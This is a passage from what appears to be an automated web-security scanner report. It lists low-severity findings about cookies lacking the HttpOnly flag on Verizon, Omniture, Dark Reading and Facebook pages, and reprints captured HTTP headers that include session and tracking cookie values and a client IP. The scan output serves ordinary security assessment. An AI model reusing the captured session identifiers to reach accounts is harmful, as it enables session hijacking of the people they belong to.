webmail_ad="ad=2"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:19:04 GMT; Path=/
lob=webmail; Domain=.verizon.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signin/ HTTP/1.1
Host: webmail.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

10.101. http://webmail.verizon.net/signin/Login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.verizon.net
Path:	/signin/Login.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

webmail_ad="ad=1"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:39:25 GMT; Path=/
lob=webmail; Domain=.verizon.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signin/Login.jsp?src=SAM&err=1011 HTTP/1.1
Host: webmail.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=284C4BA4247C07559CC0CBDE7C05939B; webmail_ad="ad=1"; lob=webmail; WT_FPC=id=2a58c7583c8b5978c401315268334507:lv=1315268334507:ss=1315268334507; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; amlbcookie=03

Response

10.102. http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s53773487436119 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://whitefence.112.2o7.net
Path:	/b/ss/pcwhitefencecom/1/H.21/s53773487436119

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|2732A56F050113D4-60000101403355AE|x7Flxxgfx7Bjijaljlx60b|2732A76805160411-600001A3402E5C46[CE]; Expires=Sat, 3 Sep 2016 22:38:53 GMT; Domain=whitefence.112.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/pcwhitefencecom/1/H.21/s53773487436119?AQB=1&ndh=1&t=5/8/2011%2022%3A38%3A47%201%20300&ns=whitefence&pageName=ConnectToVerizon-Login_Failed&g=http%3A//www.connecttoverizon.com/loginFailed.html%3Funame%3D%26Submit.x%3D91%26Submit.y%3D17%26loginPageUrl%3Dhttp%253A%252F%252Fwww.connecttoverizon.com%26Submit%3DSubmit%26loginFailedUrl%3Dhttp%253A%252F%252Fwww.connecttoverizon.com%252FloginFailed.html%26id%3D1053268&r=http%3A//www.connecttoverizon.com/loginFailed.html%3Funame%3Dxss%26Go.x%3D26%26Go.y%3D3%26loginPageUrl%3Dhttp%253A%252F%252Fwww.connecttoverizon.com%26Go%3DSubmit%26loginFailedUrl%3Dhttp%253A%252F%252Fwww.connecttoverizon.com%252FloginFailed.html%26id%3D1053268&cc=USD&c1=1053268&v1=1053268&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=874&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=ConnectToVerizon-Login_Failed&pidt=1&oid=http%3A//www.connecttoverizon.com/objects/images/spacer.gif&ot=IMAGE&AQE=1 HTTP/1.1
Host: whitefence.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.connecttoverizon.com/loginFailed.html?uname=&Submit.x=91&Submit.y=17&loginPageUrl=http%3A%2F%2Fwww.connecttoverizon.com&Submit=Submit&loginFailedUrl=http%3A%2F%2Fwww.connecttoverizon.com%2FloginFailed.html&id=1053268
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi=[CS]v1|2732A56F050113D4-60000101403355AE[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:38:53 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Flxxgfx7Bjijaljlx60b=; Expires=Wed, 30 Jun 1993 20:00:00 GMT; Domain=whitefence.112.2o7.net; Path=/
Set-Cookie: s_vi_x7Flxxgfx7Bjijaljlx60b=; Expires=Wed, 30 Jun 1993 20:00:00 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi=[CS]v1|2732A56F050113D4-60000101403355AE|x7Flxxgfx7Bjijaljlx60b|2732A76805160411-600001A3402E5C46[CE]; Expires=Sat, 3 Sep 2016 22:38:53 GMT; Domain=whitefence.112.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 04 Sep 2011 22:38:53 GMT
Last-Modified: Tue, 06 Sep 2011 22:38:53 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E654F7D-28D4-0BB7FCF7"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www633
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

10.103. http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s59195406346116 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://whitefence.112.2o7.net
Path:	/b/ss/pcwhitefencecom/1/H.21/s59195406346116

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_x7Flxxgfx7Bjijaljlx60b=[CS]v4|2732A76805160411-600001A3402E5C46|4E654ED0[CE]; Expires=Sat, 3 Sep 2016 22:36:00 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/pcwhitefencecom/1/H.21/s59195406346116 HTTP/1.1
Host: whitefence.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:00 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Flxxgfx7Bjijaljlx60b=[CS]v4|2732A76805160411-600001A3402E5C46|4E654ED0[CE]; Expires=Sat, 3 Sep 2016 22:36:00 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 04 Sep 2011 22:36:00 GMT
Last-Modified: Tue, 06 Sep 2011 22:36:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E654ED0-0807-7CA57AFB"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www626
Content-Length: 43
Content-Type: image/gif
Connection: close

GIF89a.............!.......,............Q.;

10.104. http://www.darkreading.com/security/attacks/showArticle.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.darkreading.com
Path:	/security/attacks/showArticle.jhtml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

iwa_user_login_check=aHFlcnBxYTE5ZmU2aGVmdmF0OWFxM25vYzE%3D; expires=Mon, 05-Sep-2011 22:38:09 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security/attacks/showArticle.jhtml HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.105. http://www.facebook.com/dialog/feed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/dialog/feed

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

locale=en_US; expires=Mon, 12-Sep-2011 22:36:10 GMT; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdialog%2Ffeed; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dialog/feed HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.106. http://www.verizonbusiness.com/Medium/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262202|VP%3d2|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:20:26 GMT; domain=www.verizonbusiness.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/ HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "4d375cecad1a1676dcb66aae637de263"
Last-Modified: Mon, 05 Sep 2011 22:16:42 GMT
Vary: *
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 35613
Date: Mon, 05 Sep 2011 22:16:42 GMT
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262202|VP%3d2|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:20:26 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:16:42 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.107. http://www.verizonbusiness.com/Medium/about/promotions/first_6_months/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/about/promotions/first_6_months/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263391|VP%3d55|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:15 GMT; domain=www.verizonbusiness.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/about/promotions/first_6_months/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "62932d88f61687f6e484410ff7172a0e"
Last-Modified: Mon, 05 Sep 2011 22:36:31 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:32 GMT
Content-Length: 22487
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263391|VP%3d55|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:15 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:31 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.108. http://www.verizonbusiness.com/Medium/about/promotions/premium_data_center/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/about/promotions/premium_data_center/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263391|VP%3d56|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:15 GMT; domain=www.verizonbusiness.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/about/promotions/premium_data_center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:36:31 GMT
Server: Roxen/4.5.146-release3
ETag: "d7a0245de1dca5084bcaad7d1d441f84"
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:31 GMT
Content-Length: 23185
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263391|VP%3d56|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:15 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:31 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.109. http://www.verizonbusiness.com/Medium/about/promotions/smp/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/about/promotions/smp/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263385|VP%3d54|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:09 GMT; domain=www.verizonbusiness.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/about/promotions/smp/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:36:25 GMT
Server: Roxen/4.5.146-release3
ETag: "fa4aac09eac1b44b937f28b8ee8342f9"
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:25 GMT
Content-Length: 25238
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263385|VP%3d54|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:09 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:25 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.110. http://www.verizonbusiness.com/Medium/bundles/vsbb/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/bundles/vsbb/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263378|VP%3d49|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:02 GMT; domain=www.verizonbusiness.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/bundles/vsbb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "dbb3cfabe4229776e81ce03219b6376e"
Last-Modified: Mon, 05 Sep 2011 22:36:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263378|VP%3d49|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:02 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:18 GMT
Content-Length: 34610

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.111. http://www.verizonbusiness.com/Medium/products/conferencing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/products/conferencing/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263387|VP%3d52|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:11 GMT; domain=www.verizonbusiness.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/products/conferencing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:36:27 GMT
Server: Roxen/4.5.146-release3
ETag: "682b2e7de0b0c4aafcb1f140c307ad94"
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:27 GMT
Content-Length: 24168
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263387|VP%3d52|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:11 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:27 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.112. http://www.verizonbusiness.com/Medium/products/internet/ida/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/products/internet/ida/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263380|VP%3d50|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:04 GMT; domain=www.verizonbusiness.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/products/internet/ida/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:36:20 GMT
Server: Roxen/4.5.146-release3
ETag: "1ffc9ee9f2c2d58d7b4cf59683dda86b"
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:21 GMT
Content-Length: 25699
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263380|VP%3d50|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:04 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:20 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.113. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/products/itinfrastructure/computing/caas_smb/video/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263380|VP%3d51|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:04 GMT; domain=www.verizonbusiness.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/products/itinfrastructure/computing/caas_smb/video/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:36:20 GMT
Server: Roxen/4.5.146-release3
ETag: "65353037b41c6496f3ab15c2110ba95e"
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:20 GMT
Content-Length: 12542
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263380|VP%3d51|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:04 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:20 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.114. http://www.verizonbusiness.com/Medium/products/managed/managed_mobility/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/products/managed/managed_mobility/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263385|VP%3d53|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:09 GMT; domain=www.verizonbusiness.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/products/managed/managed_mobility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "377ad8868d28add230d79bce2286f6a6"
Last-Modified: Mon, 05 Sep 2011 22:36:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:25 GMT
Content-Length: 25367
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263385|VP%3d53|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:09 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:25 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.115. http://www.verizonbusiness.com/Medium/sign-in/vec/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262264|VP%3d5|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:21:28 GMT; domain=www.verizonbusiness.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/sign-in/vec/ HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262200|VP%3d1|RMC%3dxg|LP%3den; __utma=58777642.1910521591.1315279004.1315279004.1315279004.1; __utmb=58777642.5.9.1315279031192; __utmc=58777642; __utmz=58777642.1315279004.1.1.utmcsr=www22.verizon.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "5253d46cfeae5ec60b43ca341768ecf3"
Last-Modified: Mon, 05 Sep 2011 22:17:44 GMT
Vary: *
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 20846
Date: Mon, 05 Sep 2011 22:17:45 GMT
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262264|VP%3d5|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:21:28 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:17:44 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
